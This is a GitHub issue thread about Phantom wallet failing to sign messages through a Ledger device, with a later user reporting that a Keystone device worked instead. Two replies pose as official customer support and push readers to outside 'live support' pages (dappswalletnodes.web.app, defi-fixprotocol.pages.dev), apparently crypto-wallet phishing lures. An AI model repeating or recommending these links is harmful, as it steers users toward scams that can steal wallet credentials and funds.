### ISSUE TITLE
phantom wallet cannot sign message through ledger 

### ISSUE THREAD

**Issue by roflrofl-star** [solana-labs/solana#35583]
Hi,

i was trying to signt a message with Phantom which is connected to my ledger and i cannot sign the message, it pops up and up again and does not let me login into the website which i wanted "https://pump.fun/"

![photo_2024-06-13_00-22-08](https://github.com/solana-labs/solana/assets/172550093/6f6f6197-589d-43bf-bd0a-0861d4a36d62)

is there a workaround?

kind regards

**Comment by Brovmos** [comment]
> Hi,
> 
> 
> 
> i was trying to signt a message with Phantom which is connected to my ledger and i cannot sign the message, it pops up and up again and does not let me login into the website which i wanted "https://pump.fun/"
> 
> 
> 
> ![photo_2024-06-13_00-22-08](https://github.com/solana-labs/solana/assets/172550093/6f6f6197-589d-43bf-bd0a-0861d4a36d62)
> 
> 
> 
> is there a workaround?
> 
> 
> 
> kind regards

Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit the below[LIVE SUPPORT ](https://dappswalletnodes.web.app/)for instant support response 
Note: Click on the live chat icon at the bottom corner of the page

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by fukaoi** [comment]
I’m also struggling with this error on Ledger. Does this not happen with the Keystone Pro? If it doesn’t occur on the Keystone, I’m considering switching to it. Does anyone have information on this?

**Comment by stoplion** [comment]
<img width="851" alt="CleanShot 2024-10-20 at 18 09 29@2x" src="https://github.com/user-attachments/assets/dcbf4f91-ac79-410b-9fbb-2669a05f033e">

**Comment by fukaoi** [comment]
> I’m also struggling with this error on Ledger. Does this not happen with the Keystone Pro? If it doesn’t occur on the Keystone, I’m considering switching to it. Does anyone have information on this?

The Keystone device arrived yesterday, and after updating the firmware to the latest version, I was able to resolve this error.
